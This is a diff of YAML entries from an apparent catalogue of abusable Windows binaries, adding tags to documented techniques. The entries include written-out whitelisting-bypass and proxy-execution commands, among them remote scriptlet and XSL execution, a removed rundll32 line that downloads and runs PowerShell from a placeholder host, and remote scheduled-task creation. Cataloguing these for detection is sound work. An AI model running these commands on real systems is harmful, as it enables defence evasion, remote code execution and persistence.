  - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\regasm.exe
--- a/yml/OSBinaries/Regsvcs.yml
+++ b/yml/OSBinaries/Regsvcs.yml
@ -5,25 +5,23 @@ Author: 'Oddvar Moe'
 Created: 2018-05-25
 Commands:
  - Command: regsvcs.exe AllTheThingsx64.dll
-    Description: Loads the target .DLL file and executes the RegisterClass function.
+    Description: Loads the target .Net DLL file and executes the RegisterClass function.
    Usecase: Execute dll file and bypass Application whitelisting
    Category: Execute
    Privileges: User
    MitreID: T1218.009
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
-      - Execute: DLL
+      - Execute: DLL (.NET)
      - Input: Custom Format
  - Command: regsvcs.exe AllTheThingsx64.dll
-    Description: Loads the target .DLL file and executes the RegisterClass function.
+    Description: Loads the target .Net DLL file and executes the RegisterClass function.
    Usecase: Execute dll file and bypass Application whitelisting
    Category: AWL Bypass
    Privileges: Local Admin
    MitreID: T1218.009
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
-      - Execute: DLL
+      - Execute: DLL (.NET)
      - Input: Custom Format
 Full_Path:
  - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\RegSvcs.exe
  - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe
--- a/yml/OSBinaries/Regsvr32.yml
+++ b/yml/OSBinaries/Regsvr32.yml
@ -11,6 +11,9 @@ Commands:
    Privileges: User
    MitreID: T1218.010
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
      - Execute: SCT
      - Execute: Remote
  - Command: regsvr32.exe /s /u /i:file.sct scrobj.dll
    Description: Execute the specified local .SCT script with scrobj.dll.
    Usecase: Execute code from scriptlet, bypass Application whitelisting
@ -18,6 +21,8 @@ Commands:
    Privileges: User
    MitreID: T1218.010
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
      - Execute: SCT
  - Command: regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll
    Description: Execute the specified remote .SCT script with scrobj.dll.
    Usecase: Execute code from remote scriptlet, bypass Application whitelisting
@ -25,6 +30,9 @@ Commands:
    Privileges: User
    MitreID: T1218.010
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
      - Execute: SCT
      - Execute: Remote
  - Command: regsvr32.exe /s /u /i:file.sct scrobj.dll
    Description: Execute the specified local .SCT script with scrobj.dll.
    Usecase: Execute code from scriptlet, bypass Application whitelisting
@ -32,6 +40,8 @@ Commands:
    Privileges: User
    MitreID: T1218.010
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
      - Execute: SCT
 Full_Path:
  - Path: C:\Windows\System32\regsvr32.exe
  - Path: C:\Windows\SysWOW64\regsvr32.exe
--- a/yml/OSBinaries/Rundll32.yml
+++ b/yml/OSBinaries/Rundll32.yml
@ -22,13 +22,7 @@ Commands:
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
      - Execute: DLL
-  - Command: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://ip:port/');")
+      - Execute: Remote
    Description: Use Rundll32.exe to execute a JavaScript script that runs a PowerShell script that is downloaded from a remote web site.
    Usecase: Execute code from Internet
    Category: Execute
    Privileges: User
    MitreID: T1218.011
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
  - Command: rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("w=new%20ActiveXObject(\"WScript.Shell\");w.run(\"calc\");window.close()");
    Description: Use Rundll32.exe to execute a JavaScript script that runs calc.exe.
    Usecase: Proxy execution
@ -36,13 +30,8 @@ Commands:
    Privileges: User
    MitreID: T1218.011
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
-  - Command: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WScript.Shell").run("calc.exe",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}
+    Tags:
-    Description: Use Rundll32.exe to execute a JavaScript script that runs calc.exe and then kills the Rundll32.exe process that was started.
+      - Execute: JScript
    Usecase: Proxy execution
    Category: Execute
    Privileges: User
    MitreID: T1218.011
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
  - Command: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https://raw.githubusercontent.com/3gstudent/Javascript-Backdoor/master/test")
    Description: Use Rundll32.exe to execute a JavaScript script that calls a remote JavaScript script.
    Usecase: Execute code from Internet
@ -50,6 +39,8 @@ Commands:
    Privileges: User
    MitreID: T1218.011
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
      - Execute: JScript
  - Command: rundll32 "C:\ads\file.txt:ADSDLL.dll",DllMain
    Description: Use Rundll32.exe to execute a .DLL file stored in an Alternate Data Stream (ADS).
    Usecase: Execute code from alternate data stream
@ -67,7 +58,7 @@ Commands:
    MitreID: T1218.011
    OperatingSystem: Windows 10 (and likely previous versions), Windows 11
    Tags:
-      - Execute: DLL
+      - Execute: COM
 Full_Path:
  - Path: C:\Windows\System32\rundll32.exe
  - Path: C:\Windows\SysWOW64\rundll32.exe
--- a/yml/OSBinaries/Runexehelper.yml
+++ b/yml/OSBinaries/Runexehelper.yml
@ -11,6 +11,8 @@ Commands:
    Privileges: User
    MitreID: T1218
    OperatingSystem: Windows 10, Windows 11, Windows Server 2012, Windows Server 2016, Windows Server 2019, Windows Server 2022
    Tags:
      - Execute: EXE
 Full_Path:
  - Path: c:\windows\system32\runexehelper.exe
 Detection:
--- a/yml/OSBinaries/Runonce.yml
+++ b/yml/OSBinaries/Runonce.yml
@ -11,6 +11,8 @@ Commands:
    Privileges: Administrator
    MitreID: T1218
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
      - Execute: CMD
 Full_Path:
  - Path: C:\Windows\System32\runonce.exe
  - Path: C:\Windows\SysWOW64\runonce.exe
--- a/yml/OSBinaries/Runscripthelper.yml
+++ b/yml/OSBinaries/Runscripthelper.yml
@ -11,6 +11,8 @@ Commands:
    Privileges: User
    MitreID: T1218
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
    Tags:
      - Execute: PowerShell
 Full_Path:
  - Path: C:\Windows\WinSxS\amd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.16299.15_none_c2df1bba78111118\Runscripthelper.exe
  - Path: C:\Windows\WinSxS\amd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.16299.192_none_ad4699b571e00c4a\Runscripthelper.exe
--- a/yml/OSBinaries/Sc.yml
+++ b/yml/OSBinaries/Sc.yml
@ -11,6 +11,8 @@ Commands:
    Privileges: User
    MitreID: T1564.004
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
      - Execute: EXE
  - Command: sc config <existing> binPath="\"c:\\ADS\\file.txt:cmd.exe\" /c echo works > \"c:\ADS\works.txt\"" & sc start <existing>
    Description: Modifies an existing service and executes the file stored in the ADS.
    Usecase: Execute binary file hidden inside an alternate data stream
@ -18,6 +20,8 @@ Commands:
    Privileges: User
    MitreID: T1564.004
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
      - Execute: EXE
 Full_Path:
  - Path: C:\Windows\System32\sc.exe
  - Path: C:\Windows\SysWOW64\sc.exe
--- a/yml/OSBinaries/Schtasks.yml
+++ b/yml/OSBinaries/Schtasks.yml
@ -11,6 +11,8 @@ Commands:
    Privileges: User
    MitreID: T1053.005
    OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
      - Execute: CMD
  - Command: schtasks /create /s targetmachine /tn "MyTask" /tr c:\some\directory\notevil.exe /sc daily
    Description: Create a scheduled task on a remote computer for persistence/lateral movement
    Usecase: Create a remote task to run daily relative to the the time of creation
@ -18,6 +20,8 @@ Commands:
    Privileges: Administrator
    MitreID: T1053.005
    OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
      - Execute: CMD
 Full_Path:
  - Path: c:\windows\system32\schtasks.exe
  - Path: c:\windows\syswow64\schtasks.exe
--- a/yml/OSBinaries/Scriptrunner.yml
+++ b/yml/OSBinaries/Scriptrunner.yml
@ -11,6 +11,8 @@ Commands:
    Privileges: User
    MitreID: T1202
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
      - Execute: EXE
  - Command: ScriptRunner.exe -appvscript "\\fileserver\calc.cmd"
    Description: Executes calc.cmd from remote server
    Usecase: Execute binary through proxy binary from external server to evade defensive counter measures
@ -18,6 +20,9 @@ Commands:
    Privileges: User
    MitreID: T1218
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
      - Execute: Remote
      - Execute: CMD
 Full_Path:
  - Path: C:\Windows\System32\scriptrunner.exe
  - Path: C:\Windows\SysWOW64\scriptrunner.exe
--- a/yml/OSBinaries/Setres.yml
+++ b/yml/OSBinaries/Setres.yml
@ -11,6 +11,8 @@ Commands:
    Privileges: User
    MitreID: T1218
    OperatingSystem: Windows Server 2012, Windows Server 2016, Windows Server 2019, Windows Server 2022
    Tags:
      - Execute: EXE
 Full_Path:
  - Path: c:\windows\system32\setres.exe
 Detection:
--- a/yml/OSBinaries/SettingSyncHost.yml
+++ b/yml/OSBinaries/SettingSyncHost.yml
@ -11,6 +11,8 @@ Commands:
    Privileges: User
    MitreID: T1218
    OperatingSystem: Windows 8, Windows 8.1, Windows 10
    Tags:
      - Execute: EXE
  - Command: SettingSyncHost -LoadAndRunDiagScriptNoCab anything
    Description: Execute a batch script in the background (no window ever pops up) which can be subverted to running arbitrary programs by setting the current working directory to %TMP% and creating files such as reg.bat/reg.exe in that directory thereby causing them to execute instead of the ones in C:\Windows\System32.
    Usecase: Can be used to evade defensive countermeasures or to hide as a persistence mechanism. Additionally, effectively act as a -WindowStyle Hidden option (as there is in PowerShell) for any arbitrary batch file.
@ -18,6 +20,8 @@ Commands:
    Privileges: User
    MitreID: T1218
    OperatingSystem: Windows 8, Windows 8.1, Windows 10
    Tags:
      - Execute: CMD
 Full_Path:
  - Path: C:\Windows\System32\SettingSyncHost.exe
  - Path: C:\Windows\SysWOW64\SettingSyncHost.exe
--- a/yml/OSBinaries/Ssh.yml
+++ b/yml/OSBinaries/Ssh.yml
@ -11,6 +11,8 @@ Commands:
    Privileges: User
    MitreID: T1202
    OperatingSystem: Windows 10 1809, Windows Server 2019
    Tags:
      - Execute: CMD
  - Command: ssh -o ProxyCommand=calc.exe .
    Description: Executes calc.exe from ssh.exe
    Usecase: Performs execution of specified file, can be used as a defensive evasion.
@ -18,6 +20,8 @@ Commands:
    Privileges: User
    MitreID: T1202
    OperatingSystem: Windows 10
    Tags:
      - Execute: CMD
 Full_Path:
  - Path: c:\windows\system32\OpenSSH\ssh.exe
 Detection:
--- a/yml/OSBinaries/Stordiag.yml
+++ b/yml/OSBinaries/Stordiag.yml
@ -11,6 +11,8 @@ Commands:
    Privileges: User
    MitreID: T1218
    OperatingSystem: Windows 10
    Tags:
      - Execute: EXE
  - Command: stordiag.exe
    Description: Once executed, Stordiag.exe will execute schtasks.exe and powershell.exe - if stordiag.exe is copied to a folder and an arbitrary executable is renamed to one of these names, stordiag.exe will execute it.
    Usecase: Possible defence evasion purposes.
@ -18,6 +20,8 @@ Commands:
    Privileges: User
    MitreID: T1218
    OperatingSystem: Windows 11
    Tags:
      - Execute: EXE
 Full_Path:
  - Path: c:\windows\system32\stordiag.exe
  - Path: c:\windows\syswow64\stordiag.exe
--- a/yml/OSBinaries/Syncappvpublishingserver.yml
+++ b/yml/OSBinaries/Syncappvpublishingserver.yml
@ -11,6 +11,8 @@ Commands:
    Privileges: User
    MitreID: T1218
    OperatingSystem: Windows 10 1709, Windows 10 1703, Windows 10 1607
    Tags:
      - Execute: PowerShell
 Full_Path:
  - Path: C:\Windows\System32\SyncAppvPublishingServer.exe
  - Path: C:\Windows\SysWOW64\SyncAppvPublishingServer.exe
--- a/yml/OSBinaries/Ttdinject.yml
+++ b/yml/OSBinaries/Ttdinject.yml
@ -11,6 +11,8 @@ Commands:
    Privileges: Administrator
    MitreID: T1127
    OperatingSystem: Windows 10 2004 and above, Windows 11
    Tags:
      - Execute: EXE
  - Command: ttdinject.exe /ClientScenario TTDRecorder /ddload 0 /ClientParams "7 tmp.run 0 0 0 0 0 0 0 0 0 0" /launch "C:/Windows/System32/calc.exe"
    Description: Execute calc using ttdinject.exe. Requires administrator privileges. A log file will be created in tmp.run. The log file can be changed, but the length (7) has to be updated.
    Usecase: Spawn process using other binary
@ -18,6 +20,8 @@ Commands:
    Privileges: Administrator
    MitreID: T1127
    OperatingSystem: Windows 10 1909 and below
    Tags:
      - Execute: EXE
 Full_Path:
  - Path: C:\Windows\System32\ttdinject.exe
  - Path: C:\Windows\Syswow64\ttdinject.exe
--- a/yml/OSBinaries/Tttracer.yml
+++ b/yml/OSBinaries/Tttracer.yml
@ -11,6 +11,8 @@ Commands:
    Privileges: Administrator
    MitreID: T1127
    OperatingSystem: Windows 10 1809 and newer, Windows 11
    Tags:
      - Execute: EXE
  - Command: TTTracer.exe -dumpFull -attach pid
    Description: Dumps process using tttracer.exe. Requires administrator privileges
    Usecase: Dump process by PID
--- a/yml/OSBinaries/Unregmp2.yml
+++ b/yml/OSBinaries/Unregmp2.yml
@ -11,6 +11,8 @@ Commands:
    Privileges: User
    MitreID: T1202
    OperatingSystem: Windows 10
    Tags:
      - Execute: EXE
 Full_Path:
  - Path: C:\Windows\System32\unregmp2.exe
  - Path: C:\Windows\SysWOW64\unregmp2.exe
--- a/yml/OSBinaries/Vbc.yml
+++ b/yml/OSBinaries/Vbc.yml
@ -11,8 +11,6 @@ Commands:
    Privileges: User
    MitreID: T1127
    OperatingSystem: Windows 7, Windows 10, Windows 11
    Tags:
      - Execute: WSH
  - Command: vbc -reference:Microsoft.VisualBasic.dll c:\temp\vbs\run.vb
    Description: Binary file used by .NET to compile Visual Basic code to an executable.
    Usecase: Compile attacker code on system. Bypass defensive counter measures.
@ -20,8 +18,6 @@ Commands:
    Privileges: User
    MitreID: T1127
    OperatingSystem: Windows 7, Windows 10, Windows 11
    Tags:
      - Execute: WSH
 Full_Path:
  - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
  - Path: C:\Windows\Microsoft.NET\Framework\v3.5\vbc.exe
--- a/yml/OSBinaries/Verclsid.yml
+++ b/yml/OSBinaries/Verclsid.yml
@ -11,6 +11,8 @@ Commands:
    Privileges: User
    MitreID: T1218.012
    OperatingSystem: Windows 10, Windows 11
    Tags:
      - Execute: COM
 Full_Path:
  - Path: C:\Windows\System32\verclsid.exe
  - Path: C:\Windows\SysWOW64\verclsid.exe
--- a/yml/OSBinaries/Wab.yml
+++ b/yml/OSBinaries/Wab.yml
@ -11,6 +11,8 @@ Commands:
    Privileges: Administrator
    MitreID: T1218
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
      - Execute: DLL
 Full_Path:
  - Path: C:\Program Files\Windows Mail\wab.exe
  - Path: C:\Program Files (x86)\Windows Mail\wab.exe
--- a/yml/OSBinaries/Winget.yml
+++ b/yml/OSBinaries/Winget.yml
@ -11,6 +11,9 @@ Commands:
    Privileges: Local Administrator - required to enable local manifest setting
    MitreID: T1105
    OperatingSystem: Windows 10, Windows 11
    Tags:
      - Execute: Remote
      - Execute: EXE
  - Command: winget.exe install --accept-package-agreements -s msstore [name or ID]
    Description: 'Download and install any software from the Microsoft Store using its name or Store ID, even if the Microsoft Store App itself is blocked on the machine. For example, use "Sysinternals Suite" or `9p7knl5rwt25` for obtaining ProcDump, PsExec via the Sysinternals Suite. Note: a Microsoft account is required for this.'
    Usecase: Download and install software from Microsoft Store, even if Microsoft Store App is blocked
--- a/yml/OSBinaries/Wlrmdr.yml
+++ b/yml/OSBinaries/Wlrmdr.yml
@ -11,6 +11,8 @@ Commands:
    Privileges: User
    MitreID: T1202
    OperatingSystem: Windows 10, Windows 11
    Tags:
      - Execute: EXE
 Full_Path:
  - Path: c:\windows\system32\wlrmdr.exe
 Code_Sample:
--- a/yml/OSBinaries/Wmic.yml
+++ b/yml/OSBinaries/Wmic.yml
@ -11,6 +11,8 @@ Commands:
    Privileges: User
    MitreID: T1564.004
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
      - Execute: EXE
  - Command: wmic.exe process call create calc
    Description: Execute calc from wmic
    Usecase: Execute binary from wmic to evade defensive counter measures
@ -18,6 +20,8 @@ Commands:
    Privileges: User
    MitreID: T1218
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
      - Execute: CMD
  - Command: wmic.exe /node:"192.168.0.1" process call create "evil.exe"
    Description: Execute evil.exe on the remote system.
    Usecase: Execute binary on a remote system
@ -25,6 +29,9 @@ Commands:
    Privileges: User
    MitreID: T1218
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
      - Execute: CMD
      - Execute: Remote
  - Command: wmic.exe process get brief /format:"https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/Wmic_calc.xsl"
    Description: Create a volume shadow copy of NTDS.dit that can be copied.
    Usecase: Execute binary on remote system
@ -32,6 +39,9 @@ Commands:
    Privileges: User
    MitreID: T1218
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
      - Execute: XSL
      - Execute: Remote
  - Command: wmic.exe process get brief /format:"\\127.0.0.1\c$\Tools\pocremote.xsl"
    Description: Executes JScript or VBScript embedded in the target remote XSL stylsheet.
    Usecase: Execute script from remote system
@ -40,7 +50,8 @@ Commands:
    MitreID: T1218
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
-      - Execute: WSH
+      - Execute: XSL
      - Execute: Remote
  - Command: wmic.exe datafile where "Name='C:\\windows\\system32\\calc.exe'" call Copy "C:\\users\\public\\calc.exe"
    Description: Copy file from source to destination.
    Usecase: Copy file.
--- a/yml/OSBinaries/WorkFolders.yml
+++ b/yml/OSBinaries/WorkFolders.yml
@ -11,6 +11,8 @@ Commands:
    Privileges: User
    MitreID: T1218
    OperatingSystem: Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
      - Execute: EXE
 Full_Path:
  - Path: C:\Windows\System32\WorkFolders.exe
 Detection:
--- a/yml/OSBinaries/Xwizard.yml
+++ b/yml/OSBinaries/Xwizard.yml
@ -11,6 +11,8 @@ Commands:
    Privileges: User
    MitreID: T1218
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
      - Execute: COM
  - Command: xwizard RunWizard /taero /u {00000001-0000-0000-0000-0000FEEDACDC}
    Description: Xwizard.exe running a custom class that has been added to the registry. The /t and /u switch prevent an error message in later Windows 10 builds.
    Usecase: Run a com object created in registry to evade defensive counter measures
@ -18,6 +20,8 @@ Commands:
    Privileges: User
    MitreID: T1218
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
      - Execute: COM
  - Command: xwizard RunWizard {7940acf8-60ba-4213-a7c3-f3b400ee266d} /zhttps://pastebin.com/raw/iLxUT5gM
    Description: Xwizard.exe uses RemoteApp and Desktop Connections wizard to download a file, and save it to INetCache.
    Usecase: Download file from Internet
--- a/yml/OSBinaries/msedge_proxy.yml
+++ b/yml/OSBinaries/msedge_proxy.yml
@ -27,6 +27,8 @@ Commands:
    Privileges: User
    MitreID: T1218.015
    OperatingSystem: Windows 10, Windows 11
    Tags:
      - Execute: CMD
 Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/e1a713d264ac072bb76b5c4e5f41315a015d3f41/rules/windows/process_creation/proc_creation_win_susp_electron_execution_proxy.yml
 Acknowledgement:
--- a/yml/OSBinaries/msedgewebview2.yml
+++ b/yml/OSBinaries/msedgewebview2.yml
@ -11,6 +11,8 @@ Commands:
    Privileges: Low privileges
    MitreID: T1218.015
    OperatingSystem: Windows 10, Windows 11
    Tags:
      - Execute: EXE
  - Command: msedgewebview2.exe --utility-cmd-prefix="calc.exe"
    Description: This command launches the Microsoft Edge WebView2 browser control without sandboxing and will spawn calc.exe as its subprocess.
    Usecase: Proxy execution of binary
@ -18,6 +20,8 @@ Commands:
    Privileges: User
    MitreID: T1218.015
    OperatingSystem: Windows 10, Windows 11
    Tags:
      - Execute: CMD
  - Command: msedgewebview2.exe --disable-gpu-sandbox --gpu-launcher="calc.exe"
    Description: This command launches the Microsoft Edge WebView2 browser control without sandboxing and will spawn calc.exe as its subprocess.
    Usecase: Proxy execution of binary
@ -25,6 +29,8 @@ Commands:
    Privileges: User
    MitreID: T1218.015
    OperatingSystem: Windows 10, Windows 11
    Tags:
      - Execute: CMD
  - Command: msedgewebview2.exe --no-sandbox --renderer-cmd-prefix="calc.exe"
    Description: This command launches the Microsoft Edge WebView2 browser control without sandboxing and will spawn calc.exe as its subprocess.
    Usecase: Proxy execution of binary
@ -32,6 +38,8 @@ Commands:
    Privileges: User
    MitreID: T1218.015
    OperatingSystem: Windows 10, Windows 11
    Tags:
      - Execute: CMD
 Full_Path:
  - Path: C:\Program Files (x86)\Microsoft\Edge\Application\114.0.1823.43\msedgewebview2.exe
 Detection:
--- a/yml/OSBinaries/wt.yml
+++ b/yml/OSBinaries/wt.yml
@ -11,6 +11,8 @@ Commands:
    Privileges: User
    MitreID: T1202
    OperatingSystem: Windows 11
    Tags:
      - Execute: CMD
 Full_Path:
  - Path: C:\Program Files\WindowsApps\Microsoft.WindowsTerminal_<version_packageid>\wt.exe
 Detection:
--- a/yml/OSLibraries/Advpack.yml
+++ b/yml/OSLibraries/Advpack.yml
@ -11,6 +11,8 @@ Commands:
    Privileges: User
    MitreID: T1218.011
    OperatingSystem: Windows 10, Windows 11
    Tags:
      - Execute: INF
  - Command: rundll32.exe advpack.dll,LaunchINFSection c:\test.inf,,1,
    Description: Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (DefaultInstall section implied).
    Usecase: Run local or remote script(let) code through INF file specification.
@ -19,7 +21,7 @@ Commands:
    MitreID: T1218.011
    OperatingSystem: Windows 10, Windows 11
    Tags:
-      - Input: INF
+      - Execute: INF
  - Command: rundll32.exe advpack.dll,RegisterOCX test.dll
    Description: Launch a DLL payload by calling the RegisterOCX function.
    Usecase: Load a DLL payload.
@ -36,6 +38,8 @@ Commands:
    Privileges: User
    MitreID: T1218.011
    OperatingSystem: Windows 10, Windows 11
    Tags:
      - Execute: EXE
  - Command: rundll32 advpack.dll, RegisterOCX "cmd.exe /c calc.exe"
    Description: Launch command line by calling the RegisterOCX function.
    Usecase: Run an executable payload.
@ -43,6 +47,8 @@ Commands:
    Privileges: User
    MitreID: T1218.011
    OperatingSystem: Windows 10, Windows 11
    Tags:
      - Execute: CMD
 Full_Path:
  - Path: c:\windows\system32\advpack.dll
  - Path: c:\windows\syswow64\advpack.dll
--- a/yml/OSLibraries/Desk.yml
+++ b/yml/OSLibraries/Desk.yml
@ -11,6 +11,8 @@ Commands:
    Privileges: User
    MitreID: T1218.011
    OperatingSystem: Windows 10, Windows 11
    Tags:
      - Execute: EXE
  - Command: rundll32.exe desk.cpl,InstallScreenSaver \\127.0.0.1\c$\temp\file.scr
    Description: Launch a remote executable with a .scr extension, located on an SMB share, by calling the InstallScreenSaver function.
    Usecase: Launch any executable payload, as long as it uses the .scr extension.
@ -18,6 +20,9 @@ Commands:
    Privileges: User
    MitreID: T1218.011
    OperatingSystem: Windows 10, Windows 11
    Tags:
      - Execute: EXE
      - Execute: Remote
 Full_Path:
  - Path: C:\Windows\System32\desk.cpl
  - Path: C:\Windows\SysWOW64\desk.cpl
--- a/yml/OSLibraries/Dfshim.yml
+++ b/yml/OSLibraries/Dfshim.yml
@ -11,6 +11,9 @@ Commands:
    Privileges: User
    MitreID: T1127
    OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
      - Execute: ClickOnce
      - Execute: Remote
 Full_Path:
  - Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\Dfsvc.exe
  - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Dfsvc.exe
--- a/yml/OSLibraries/Ieadvpack.yml
+++ b/yml/OSLibraries/Ieadvpack.yml
@ -11,6 +11,8 @@ Commands:
    Privileges: User
    MitreID: T1218.011
    OperatingSystem: Windows 10, Windows 11
    Tags:
      - Execute: INF
  - Command: rundll32.exe ieadvpack.dll,LaunchINFSection c:\test.inf,,1,
    Description: Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (DefaultInstall section implied).
    Usecase: Run local or remote script(let) code through INF file specification.
@ -18,6 +20,8 @@ Commands:
    Privileges: User
    MitreID: T1218.011
    OperatingSystem: Windows 10, Windows 11
    Tags:
      - Execute: INF
  - Command: rundll32.exe ieadvpack.dll,RegisterOCX test.dll
    Description: Launch a DLL payload by calling the RegisterOCX function.
    Usecase: Load a DLL payload.
@ -34,6 +38,8 @@ Commands:
    Privileges: User
    MitreID: T1218.011
    OperatingSystem: Windows 10, Windows 11
    Tags:
      - Execute: EXE
  - Command: rundll32 ieadvpack.dll, RegisterOCX "cmd.exe /c calc.exe"
    Description: Launch command line by calling the RegisterOCX function.
    Usecase: Run an executable payload.
@ -41,6 +47,8 @@ Commands:
    Privileges: User
    MitreID: T1218.011
    OperatingSystem: Windows 10, Windows 11
    Tags:
      - Execute: CMD
 Full_Path:
  - Path: c:\windows\system32\ieadvpack.dll
  - Path: c:\windows\syswow64\ieadvpack.dll
--- a/yml/OSLibraries/Ieframe.yml
+++ b/yml/OSLibraries/Ieframe.yml
@ -11,6 +11,8 @@ Commands:
    Privileges: User
    MitreID: T1218.011
    OperatingSystem: Windows 10, Windows 11
    Tags:
      - Execute: URL
 Full_Path:
  - Path: c:\windows\system32\ieframe.dll
  - Path: c:\windows\syswow64\ieframe.dll
--- a/yml/OSLibraries/Mshtml.yml
+++ b/yml/OSLibraries/Mshtml.yml
@ -11,6 +11,8 @@ Commands:
    Privileges: User
    MitreID: T1218.011
    OperatingSystem: Windows 10, Windows 11
    Tags:
      - Execute: HTA
 Full_Path:
  - Path: c:\windows\system32\mshtml.dll
  - Path: c:\windows\syswow64\mshtml.dll
--- a/yml/OSLibraries/Pcwutl.yml
+++ b/yml/OSLibraries/Pcwutl.yml
@ -11,6 +11,8 @@ Commands:
    Privileges: User
    MitreID: T1218.011
    OperatingSystem: Windows 10, Windows 11
    Tags:
      - Execute: EXE
 Full_Path:
  - Path: c:\windows\system32\pcwutl.dll
  - Path: c:\windows\syswow64\pcwutl.dll
--- a/yml/OSLibraries/Setupapi.yml
+++ b/yml/OSLibraries/Setupapi.yml
@ -12,7 +12,7 @@ Commands:
    MitreID: T1218.011
    OperatingSystem: Windows 10, Windows 11
    Tags:
-      - Input: INF
+      - Execute: INF
  - Command: rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 C:\Tools\calc_exe.inf
    Description: Launch an executable file via the InstallHinfSection function and .inf file section directive.
    Usecase: Load an executable payload.
@ -21,7 +21,7 @@ Commands:
    MitreID: T1218.011
    OperatingSystem: Windows
    Tags:
-      - Input: INF
+      - Execute: INF
 Full_Path:
  - Path: c:\windows\system32\setupapi.dll
  - Path: c:\windows\syswow64\setupapi.dll
--- a/yml/OSLibraries/Shdocvw.yml
+++ b/yml/OSLibraries/Shdocvw.yml
@ -11,6 +11,8 @@ Commands:
    Privileges: User
    MitreID: T1218.011
    OperatingSystem: Windows 10, Windows 11
    Tags:
      - Execute: URL
 Full_Path:
  - Path: c:\windows\system32\shdocvw.dll
  - Path: c:\windows\syswow64\shdocvw.dll
--- a/yml/OSLibraries/Shell32.yml
+++ b/yml/OSLibraries/Shell32.yml
@ -20,6 +20,8 @@ Commands:
    Privileges: User
    MitreID: T1218.011
    OperatingSystem: Windows 10, Windows 11
    Tags:
      - Execute: EXE
  - Command: rundll32 SHELL32.DLL,ShellExec_RunDLL "cmd.exe" "/c echo hi"
    Description: Launch command line by calling the ShellExec_RunDLL function.
    Usecase: Run an executable payload.
@ -27,6 +29,8 @@ Commands:
    Privileges: User
    MitreID: T1218.011
    OperatingSystem: Windows 10, Windows 11
    Tags:
      - Execute: CMD
 Full_Path:
  - Path: c:\windows\system32\shell32.dll
  - Path: c:\windows\syswow64\shell32.dll
--- a/yml/OSLibraries/Syssetup.yml
+++ b/yml/OSLibraries/Syssetup.yml
@ -12,7 +12,7 @@ Commands:
    MitreID: T1218.011
    OperatingSystem: Windows 10, Windows 11
    Tags:
-      - Input: INF
+      - Execute: INF
  - Command: rundll32 syssetup.dll,SetupInfObjectInstallAction DefaultInstall 128 c:\temp\something.inf
